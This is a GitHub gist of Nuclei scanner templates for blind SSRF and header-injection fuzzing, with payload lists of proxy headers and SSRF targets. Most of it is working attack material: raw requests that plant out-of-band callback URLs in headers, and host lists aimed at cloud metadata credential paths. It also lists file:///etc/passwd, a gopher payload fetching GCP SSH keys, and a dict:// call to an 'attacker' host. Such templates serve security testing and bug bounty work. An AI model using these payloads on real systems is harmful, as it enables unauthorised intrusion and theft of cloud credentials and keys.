Forked from ResistanceIsUseless/Header-Injection.yaml
Created
December 18, 2023 06:48
-
-
Save emadshanab/65310596d064af2000bc60e6487fc97b to your computer and use it in GitHub Desktop.
Nuclei SSRF Fuzzing Template
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| id: header-blind-ssrf | |
| info: | |
| name: Header Blind SSRF Injection | |
| author: geeknik,nullrabbit | |
| severity: high | |
| description: Checks for Blind SSR via popular browser headers. | |
| tags: ssrf | |
| requests: | |
| - payloads: | |
| header: helpers/payloads/proxy-headers.txt | |
| raw: | |
| - | | |
| GET /?§header§ HTTP/1.1 | |
| Host: {{Hostname}} | |
| User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 | |
| §header§: {{interactsh-url}} | |
| Connection: close | |
| redirects: true | |
| max-redirects: 5 | |
| matchers-condition: and | |
| matchers: | |
| - type: word | |
| part: interactsh_protocol | |
| words: | |
| - "dns" | |
| - "http" | |
| condition: or |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| id: header-injection | |
| info: | |
| name: Header SSRF Injection | |
| author: nullrabbit | |
| severity: high | |
| description: Fuzzing headers for OOB SSRF | |
| tags: fuzz,ssrf | |
| requests: | |
| - payloads: | |
| header: helpers/payloads/proxy-headers.txt | |
| - raw: | |
| - | | |
| GET / HTTP/1.1 | |
| Host: {{interactsh-url}} | |
| User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 | |
| Connection: close | |
| - | | |
| GET / HTTP/1.1 | |
| Host: {{Hostname}} | |
| Host: {{interactsh-url}} | |
| User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 | |
| Connection: close | |
| - | | |
| GET / HTTP/1.1 | |
| Host: {{Hostname}}@{{interactsh-url}} | |
| User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 | |
| Connection: close | |
| GET / HTTP/1.1 | |
| Host: {{Hostname}}@{{interactsh-url}} | |
| User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 | |
| Connection: close | |
| - | | |
| GET / HTTP/1.1 | |
| Host: {{BaseURL}}@{{interactsh-url}} | |
| User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 | |
| Connection: close | |
| - | | |
| GET @{{interactsh-url}} HTTP/1.1 | |
| Host: {{Hostname}} | |
| User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 | |
| Connection: close | |
| - | | |
| GET {{BaseURL}} HTTP/1.1 | |
| Host: {{Hostname}} | |
| User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 | |
| Connection: close | |
| - | | |
| GET / HTTP/1.1 | |
| Host: {{interactsh-url}} | |
| User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 | |
| X-Forwarded-Host: {{interactsh-url}} | |
| Connection: close | |
| - | | |
| GET /{{interactsh-url}}/{{interactsh-url}} HTTP/1.1 | |
| Host: {{Hostname}} | |
| User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 | |
| Connection: close | |
| - | | |
| GET {{BaseURL}} HTTP/1.1 | |
| Host: {{interactsh-url}} | |
| User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 | |
| X-Forwarded-Host: {{interactsh-url}} | |
| Via: {{interactsh-url}} | |
| Connection: close | |
| - | | |
| GET / HTTP/1.1 | |
| Host: {{BaseURL}}/?{{interactsh-url}} | |
| User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 | |
| X-Forwarded-Host: {{interactsh-url}} | |
| Via: {{interactsh-url}} | |
| Connection: close | |
| - | | |
| GET / HTTP/1.1 | |
| Host: {{Hostname}} | |
| User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 | |
| X-Forwarded-For: {{interactsh-url}} | |
| Referer: {{BaseURL}}/?url={{interactsh-url}} | |
| Connection: close | |
| - | | |
| GET / HTTP/1.1 | |
| Host: {{Hostname}} | |
| User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 | |
| X-Forwarded-For: {{interactsh-url}} | |
| Referer: {{BaseURL}}/?url={{interactsh-url}} | |
| True-Client-IP: {{interactsh-url}} | |
| X-WAP-Profile: http://{{interactsh-url}}/wap.xml | |
| Connection: close | |
| - | | |
| GET / HTTP/1.1 | |
| Host: {{Hostname}} | |
| User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 | |
| X-Forwarded-For: {{interactsh-url}} | |
| Expect-Ct: max-age=6*6, report-uri="https://{{interactsh-url}}/expect-ct" | |
| Connection: close | |
| - | | |
| GET /admin HTTP/1.1 | |
| Host: {{Hostname}} | |
| User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 | |
| X-Forwarded-For: {{interactsh-url}} | |
| Connection: close | |
| - | | |
| POST /admin HTTP/1.1 | |
| Host: {{Hostname}} | |
| User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 | |
| X-Forwarded-To: {{interactsh-url}} | |
| Connection: close | |
| - | | |
| GET /api/v1/;;/admin/ HTTP/1.1 | |
| Host: {{Hostname}} | |
| User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 | |
| X-Forwarded-For: {{interactsh-url}} | |
| Connection: close | |
| - | | |
| GET /api/;;/admin/ HTTP/1.1 | |
| Host: {{Hostname}} | |
| User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 | |
| X-Forwarded-For: {{interactsh-url}} | |
| Connection: close | |
| - | | |
| GET /api/v1/secrets HTTP/1.1 | |
| Host: 127.0.0.1 | |
| User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 | |
| X-Forwarded-For: {{interactsh-url}} | |
| Connection: close | |
| - | | |
| CONNECT {{interactsh-url}} HTTP/1.1 | |
| Host: {{Hostname}} | |
| User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 | |
| X-Forwarded-Host: {{interactsh-url}} | |
| X-Forwarded-For: {{interactsh-url}} | |
| - | | |
| POST / HTTP/1.1 | |
| Host: {{interactsh-url}} | |
| User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 | |
| X-Forwarded-For: {{interactsh-url}} | |
| Connection: close | |
| - | | |
| HEAD / HTTP/1.1 | |
| Host: {{interactsh-url}} | |
| User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 | |
| X-Forwarded-To: {{interactsh-url}} | |
| Connection: close | |
| - | | |
| HEAD / HTTP/1.1 | |
| Host: {{Hostname}} | |
| Host: {{interactsh-url}} | |
| User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 | |
| Connection: close | |
| - | | |
| HEAD / HTTP/1.1 | |
| Host: {{interactsh-url}} | |
| User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 | |
| Connection: close | |
| - | | |
| HEAD / HTTP/1.1 | |
| Host: {{interactsh-url}} | |
| User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 | |
| Connection: close | |
| - | | |
| GET /stats HTTP/1.1 | |
| Host: 127.0.0.1:9901 | |
| User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 | |
| Connection: close | |
| - | | |
| GET /services HTTP/1.1 | |
| Host: 127.0.0.1:8001 | |
| User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 | |
| Connection: close | |
| - | | |
| GET /services HTTP/1.1 | |
| Host: 127.0.0.1:8444 | |
| User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 | |
| Connection: close | |
| redirects: true | |
| matchers-condition: or | |
| matchers: | |
| - type: status | |
| status: | |
| - 200 | |
| - 302 | |
| - type: word | |
| part: interactsh_protocol | |
| words: | |
| - "dns" | |
| - "http" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Proxy-Host | |
| Request-Uri | |
| X-Forwarded | |
| X-Forwarded-By | |
| X-Forwarded-For | |
| X-Forwarded-For-Original | |
| X-Forwarded-Host | |
| X-Forwarded-Server | |
| X-Forwarder-For | |
| X-Forward-For | |
| x-forwarded-proto | |
| Base-Url | |
| Http-Url | |
| Proxy-Url | |
| Redirect | |
| Real-Ip | |
| Referer | |
| Referer | |
| Referrer | |
| Refferer | |
| Uri | |
| X-Host | |
| X-Http-Destinationurl | |
| X-Http-Host-Override | |
| X-Original-Remote-Addr | |
| X-Original-Url | |
| X-Proxy-Url | |
| X-Rewrite-Url | |
| X-Real-Ip | |
| X-Remote-Addr | |
| x-requested-with | |
| x-request-id | |
| x-wap-profile | |
| x-csrftoken | |
| x-cluster-client-ip | |
| x-client-ip | |
| x-arbitrary | |
| uid | |
| true-client-ip | |
| proxy-host | |
| warning | |
| user-agent | |
| Location | |
| via | |
| Alt-Svc | |
| Proxy | |
| Profile | |
| Origin | |
| link | |
| from | |
| forwarded | |
| destination | |
| cookie | |
| contact | |
| cluster-client-ip | |
| cluster | |
| client-ip | |
| cf-connecting-ip | |
| alt-svc | |
| accept-language | |
| accept | |
| HTTP_FORWARDED | |
| HTTP_CLIENT_IP | |
| HTTP_FORWARDED_FOR | |
| HTTP_X_FORWARDED | |
| HTTP_X_FORWARDED_FOR | |
| if-modified-since |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 127.0.0.1 | |
| 127.0.1.3 | |
| 0 | |
| 127.1 | |
| 127.0.1 | |
| localhost | |
| 1.0.0.127.in-addr.arpa | |
| 01111111000000000000000000000001 | |
| 0x7f.0x0.0x0.0x1 | |
| 0177.0.0.01 | |
| 7F000001 | |
| 2130706433 | |
| 6425673729 | |
| 127001 | |
| 127_0._0_1 | |
| 0000::1 | |
| 0000::1:80 | |
| ::ffff:7f00:0001 | |
| 0000:0000:0000:0000:0000:ffff:7f00:0001 | |
| spoofed.burpcollaborator.net | |
| localtest.me | |
| customer1.app.localhost.my.company.127.0.0.1.nip.io | |
| bugbounty.dod.network | |
| 127.127.127.127 | |
| 0177.0.0.1 | |
| ⓪ⓧⓐ⑨。⓪ⓧⓕⓔ。⓪ⓧⓐ⑨。⓪ⓧⓕⓔ:80 | |
| ⓪ⓧⓐ⑨ⓕⓔⓐ⑨ⓕⓔ:80 | |
| ②⑧⑤②⓪③⑨①⑥⑥:80 | |
| ⓪②⑤①。⓪③⑦⑥。⓪②⑤①。⓪③⑦⑥:80 | |
| [email protected] | |
| 0x7f000001 | |
| 017700000001 | |
| 0177.00.00.01 | |
| 0000.0000.0000.0000 | |
| 0x7f.0x0.0x0.0x1 | |
| 0177.0000.0000.0001 | |
| 0177.0001.0000..0001 | |
| 0x7f.0x1.0x0.0x1 | |
| 0x7f.0x1.0x1 | |
| 0x7f.0x00.0x00.0x01 | |
| 0177.0.0.01 | |
| ht�️tp://12�7.0.0.1 | |
| localhost:+11211aaa | |
| localhost:00011211aaaa | |
| loopback:+11211aaa | |
| loopback:00011211aaaa | |
| ⑯⑨。②⑤④。⑯⑨。②⑤④ | |
| 169.254.169.254 | |
| 2852039166 | |
| 7147006462 | |
| 0xa9.0xfe.0xa9.0xfe | |
| 0251.0376.0251.0376 | |
| 169。254。169。254 | |
| 169。254。169。254 | |
| ⑯⑨。②⑤④。⑯⑨。②⑤④ | |
| ⓪ⓧⓐ⑨。⓪ⓧⓕⓔ。⓪ⓧⓐ⑨。⓪ⓧⓕⓔ:80 | |
| ⓪ⓧⓐ⑨ⓕⓔⓐ⑨ⓕⓔ:80 | |
| ②⑧⑤②⓪③⑨①⑥⑥:80 | |
| ④②⑤。⑤①⓪。④②⑤。⑤①⓪:80 | |
| ⓪②⑤①。⓪③⑦⑥。⓪②⑤①。⓪③⑦⑥:80 | |
| ⓪⓪②⑤①。⓪⓪⓪③⑦⑥。⓪⓪⓪⓪②⑤①。⓪⓪⓪⓪⓪③⑦⑥:80 | |
| [::①⑥⑨。②⑤④。⑯⑨。②⑤④]:80 | |
| [::ⓕⓕⓕⓕ:①⑥⑨。②⑤④。⑯⑨。②⑤④]:80 | |
| ⓪ⓧⓐ⑨。⓪③⑦⑥。④③⑤①⑧:80 | |
| ⓪ⓧⓐ⑨。⑯⑥⑧⑨⑥⑥②:80 | |
| ⓪⓪②⑤①。⑯⑥⑧⑨⑥⑥②:80 | |
| ⓪⓪②⑤①。⓪ⓧⓕⓔ。④③⑤①⑧:80 | |
| dict://attacker:11111 | |
| file:///etc/passwd | |
| file://\/\/etc/passwd | |
| file://path/to/file | |
| gopher://metadata.google.internal:80/xGET%20/computeMetadata/v1/instance/attributes/ssh-keys%20HTTP%2f%31%2e%31%0AHost:%20metadata.google.internal%0AAccept:%20%2a%2f%2a%0aMetadata-Flavor:%20Google%0d%0a | |
| gopher://nozaki.io/_SSRF%0ATest! | |
| 0.0.0.0:22 | |
| 0.0.0.0:443 | |
| 0.0.0.0:80 | |
| 0.0.0.0:443 | |
| 0.0.0.0:3389 | |
| 0000::1:22 | |
| 0000::1:25 | |
| 0000::1:3128 | |
| 0000::1:80 | |
| 0000::1:3389 | |
| 0177.0.0.1 | |
| 0251.00376.000251.0000376 | |
| 0251.0376.0251.0376 | |
| 0x41414141A9FEA9FE | |
| 0xA9.0xFE.0xA9.0xFE | |
| 0xA9FEA9FE | |
| 0xa9.0xfe.0xa9.0xfe | |
| 0xa9fea9fe | |
| 100.100.100.200/latest/meta-data/ | |
| 100.100.100.200/latest/meta-data/image-id | |
| 100.100.100.200/latest/meta-data/instance-id | |
| 127.0.0.0 | |
| 127.0.0.1:22 | |
| 127.0.0.1:2379/version | |
| 127.0.0.1:443 | |
| 127.0.0.1:80 | |
| 127.0.0.1:3389 | |
| 127.0.0.1:8000 | |
| 127.0.0.1:9901 | |
| 127.0.0.1:8001 | |
| 127.0.0.1:8444 | |
| 127.0.1.3 | |
| 127.1.1.1 | |
| 127.1.1.1:80#\@127.2.2.2:80 | |
| 127.1.1.1:80:\@@127.2.2.2:80 | |
| 127.1.1.1:80\@127.2.2.2:80 | |
| 127.1.1.1:80\@@127.2.2.2:80 | |
| 127.127.127.127 | |
| 127.127.127.127.nip.io | |
| 169.254.169.254 | |
| 169.254.169.254.xip.io | |
| 169.254.169.254/computeMetadata/v1/ | |
| 169.254.169.254/latest/dynamic/instance-identity/document | |
| 169.254.169.254/latest/meta-data/ | |
| 169.254.169.254/latest/meta-data/ami-id | |
| 169.254.169.254/latest/meta-data/hostname | |
| 169.254.169.254/latest/meta-data/iam/security-credentials/ | |
| 169.254.169.254/latest/meta-data/iam/security-credentials/PhotonInstance | |
| 169.254.169.254/latest/meta-data/iam/security-credentials/dummy | |
| 169.254.169.254/latest/meta-data/iam/security-credentials/s3access | |
| 169.254.169.254/latest/meta-data/public-keys/ | |
| 169.254.169.254/latest/meta-data/public-keys/0/openssh-key | |
| 169.254.169.254/latest/meta-data/public-keys/[ID]/openssh-key | |
| 169.254.169.254/latest/meta-data/reservation-id | |
| 169.254.169.254/latest/user-data | |
| 169.254.169.254/latest/user-data/iam/security-credentials/ | |
| 192.0.0.192/latest/ | |
| 192.0.0.192/latest/attributes/ | |
| 192.0.0.192/latest/meta-data/ | |
| 192.0.0.192/latest/user-data/ | |
| 1ynrnhl.xip.io | |
| 2130706433 | |
| 2852039166 | |
| 3232235521 | |
| 3232235777 | |
| 425.510.425.510 | |
| 7147006462 | |
| [0:0:0:0:0:ffff:127.0.0.1] | |
| [0:0:0:0:0:ffff:127.0.0.1]:8000 | |
| [0:0:0:0:0:ffff:127.0.0.1]:8001 | |
| [0:0:0:0:0:ffff:127.0.0.1]:8444 | |
| [0:0:0:0:0:ffff:127.0.0.1]:9901 | |
| [::] | |
| [::]:22 | |
| [::]:25 | |
| [::]:3128 | |
| [::]:80 | |
| [::]:3389 | |
| [::]:8000 | |
| [::]:8001 | |
| [::]:8444 | |
| [::]:9901 | |
| app-169-254-169-254.nip.io | |
| bugbounty.dod.network | |
| customer1.app.localhost.my.company.127.0.0.1.nip.io | |
| customer2-app-169-254-169-254.nip.io | |
| instance-data | |
| localhost:+11211aaa | |
| localhost:00011211aaaa | |
| localhost:22 | |
| localhost:443 | |
| localhost:80 | |
| localhost:3389 | |
| localhost:8000 | |
| localhost:8001 | |
| localhost:8444 | |
| localhost:9901 | |
| localhost.localdomain | |
| loopback | |
| loopback:22 | |
| loopback:80 | |
| loopback:443 | |
| loopback:3389 | |
| loopback:8000 | |
| loopback:9901 | |
| loopback:8001 | |
| loopback:8444 | |
| localtest.me | |
| ipcop.localdomain:8443 | |
| mail.ebc.apple.com | |
| metadata.google.internal/computeMetadata/v1/ | |
| metadata.google.internal/computeMetadata/v1/instance/hostname | |
| metadata.google.internal/computeMetadata/v1/instance/id | |
| metadata.google.internal/computeMetadata/v1/project/project-id | |
| metadata.nicob.net | |
| owasp.org.169.254.169.254.nip.io | |
| spoofed.burpcollaborator.net | |
| ssrf-169.254.169.254.localdomain.pw | |
| ssrf-cloud.localdomain.pw | |
| www.owasp.org.1ynrnhl.xip.io |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| id: ssrf-header-injection | |
| info: | |
| name: Header Command Injection | |
| author: nullrabbit | |
| severity: high | |
| description: Fuzzing headers for command injection | |
| tags: fuzz,ssrf | |
| requests: | |
| - payloads: | |
| payload: helpers/payloads/ssrf-hosts.txt | |
| header: helpers/payloads/proxy-headers.txt | |
| raw: | |
| - | | |
| GET / HTTP/1.1 | |
| Host: §payload§ | |
| User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 | |
| Connection: close | |
| - | | |
| GET / HTTP/1.1 | |
| Host: {{Hostname}} | |
| User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 | |
| §header§ §payload§ | |
| Connection: close | |
| attack: clusterbomb | |
| threads: 10 | |
| matchers: | |
| - type: status | |
| status: | |
| - 200 |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment